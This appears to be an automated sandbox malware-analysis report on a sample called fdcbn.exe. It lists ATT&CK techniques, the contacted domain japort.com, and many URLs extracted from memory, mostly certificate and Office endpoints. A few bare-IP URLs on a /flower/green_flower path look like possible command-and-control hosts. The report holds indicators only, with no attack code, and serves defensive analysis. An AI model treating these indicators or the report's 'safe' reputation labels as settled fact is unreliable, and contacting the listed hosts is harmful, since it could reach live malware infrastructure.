      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsPeripheral Device Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      japort.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
      http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
      http://ocsp.suscerte.gob.ve00%URL Reputationsafe
      http://ocsp.suscerte.gob.ve00%URL Reputationsafe
      http://ocsp.suscerte.gob.ve00%URL Reputationsafe
      http://ocsp.suscerte.gob.ve00%URL Reputationsafe
      http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
      http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
      http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
      http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      http://www.chambersign.org10%URL Reputationsafe
      http://www.chambersign.org10%URL Reputationsafe
      http://www.chambersign.org10%URL Reputationsafe
      http://www.chambersign.org10%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
      http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
      http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
      http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
      http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
      http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
      http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
      https://3.14.70.198/flower/green_flowerj0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      http://policy.camerfirma.com00%URL Reputationsafe
      http://policy.camerfirma.com00%URL Reputationsafe
      http://policy.camerfirma.com00%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      https://wus2-000.pagecontentsync.0%URL Reputationsafe
      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
      http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
      http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
      http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
      https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
      https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
      https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
      http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
      http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
      http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      http://www.globaltrust.info00%URL Reputationsafe
      http://www.globaltrust.info00%URL Reputationsafe
      http://www.globaltrust.info00%URL Reputationsafe
      https://3.14.70.198/flower/green_flower~0%Avira URL Cloudsafe
      http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
      http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
      http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
      http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
      http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
      http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
      https://3.14.70.198/0%Avira URL Cloudsafe
      http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
      http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
      http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
      http://certs.oati.net/repository/OATICA2.crt00%URL Reputationsafe
      http://certs.oati.net/repository/OATICA2.crt00%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      japort.com
      50.87.232.245
      truefalseunknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://www.certplus.com/CRL/class3.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      https://shell.suite.office.com:144306F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
        high
        http://ocsp.suscerte.gob.ve0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        https://autodiscover-s.outlook.com/06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
          high
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
            high
            http://crl.dhimyotis.com/certignarootca.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
              high
              https://cdn.entity.06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                high
                http://www.chambersign.org1fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://rpsticket.partnerservices.getmicrosoftkey.com06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://lookup.onenote.com/lookup/geolocation/v106F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                  high
                  http://repository.swisssign.com/0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                    high
                    http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://crl.ssc.lt/root-c/cacrl.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                      high
                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                        high
                        https://api.aadrm.com/06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ca.disig.sk/ca/crl/ca_disig.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.suscerte.gob.ve/dpc0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.disig.sk/ca/crl/ca_disig.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://3.14.70.198/flower/green_flowerjfdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                          high
                          https://api.microsoftstream.com/api/06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                            high
                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                              high
                              https://cr.office.com06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                high
                                http://pki.registradores.org/normativa/index.htm0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                  high
                                  https://res.getmicrosoftkey.com/api/redemptionevents06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://tasks.office.com06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                    high
                                    http://policy.camerfirma.com0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://officeci.azurewebsites.net/api/06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.anf.es/es/address-direccion.htmlfdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                      high
                                      https://www.anf.es/address/)1(0&fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                        high
                                        http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://store.office.cn/addinstemplate06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://wus2-000.pagecontentsync.06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://crl.ssc.lt/root-b/cacrl.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.certicamara.com/dpc/0Zfdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0Gfdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://crl.pki.wellsfargo.com/wsprca.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                            high
                                            https://wwww.certigna.fr/autorites/0mfdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                              high
                                              https://www.anf.es/AC/ANFServerCA.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                high
                                                https://www.odwebp.svc.ms06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://api.powerbi.com/v1.0/myorg/groups06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                  high
                                                  https://web.microsoftstream.com/video/06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                    high
                                                    http://www.globaltrust.info0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://graph.windows.net06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                      high
                                                      https://3.14.70.198/flower/green_flower~fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://ac.economia.gob.mx/last.crl0Gfdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                        high
                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                          high
                                                          http://crl.oces.trust2408.com/oces.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://eca.hinet.net/repository0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                            high
                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                              high
                                                              http://weather.service.msn.com/data.aspx06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                high
                                                                https://3.14.70.198/fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000002.500266048.000001DEEECE6000.00000004.00000020.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://certs.oaticerts.com/repository/OATICA2.crlfdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://certs.oati.net/repository/OATICA2.crt0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.accv.es00fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                  high
                                                                  https://3.19.60.159/flower/green_flower;fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                      high
                                                                      http://html4/loose.dtdfdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      low
                                                                      http://web.ncdc.gov.sa/crl/nrcaparta1.crlfdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.datev.de/zertifikat-policy-int0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        https://clients.config.office.net/user/v1.0/ios06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                          high
                                                                          https://192.168.0.1/xfdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://3.19.60.159/flower/green_flowerjfdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://3.19.60.159/flower/green_flowerlfdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://3.19.60.159/flower/green_flowerm32fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://3.19.60.159/flower/green_flowernfdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://o365auditrealtimeingestion.manage.office.com06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                            high
                                                                            https://3.19.60.159/flower/green_flowerfdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://outlook.office365.com/api/v1.0/me/Activities06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                              high
                                                                              http://www.acabogacia.org0fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://192.168.0.1/pfdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.firmaprofesional.com/cps0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                                high
                                                                                https://clients.config.office.net/user/v1.0/android/policies06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                                  high
                                                                                  https://entitlement.diagnostics.office.com06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                                    high
                                                                                    http://.cssfdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    low
                                                                                    http://crl.securetrust.com/SGCA.crl0fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                                      high
                                                                                      http://www.agesic.gub.uy/acrn/acrn.crl0)fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://outlook.office.com/06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                                        high
                                                                                        https://storage.live.com/clientlogs/uploadlocation06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drfalse
                                                                                          high
                                                                                          https://%s.pinrules.crt/%sendTraceLogca1.3.6.1.4.1.311.10.8.11.3.6.1.4.1.311.10.11.1.3.6.1.4.1.311.1fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          low
